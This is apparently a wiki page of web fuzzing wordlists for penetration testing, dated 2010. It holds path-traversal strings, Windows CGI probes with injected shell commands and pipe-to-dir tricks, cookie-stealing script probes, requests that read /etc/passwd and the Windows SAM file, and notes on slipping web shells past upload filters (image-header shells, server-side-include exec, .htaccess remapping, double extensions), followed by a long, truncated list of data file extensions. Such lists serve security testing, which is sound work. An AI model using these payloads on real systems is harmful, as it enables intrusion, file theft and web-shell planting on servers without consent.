.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
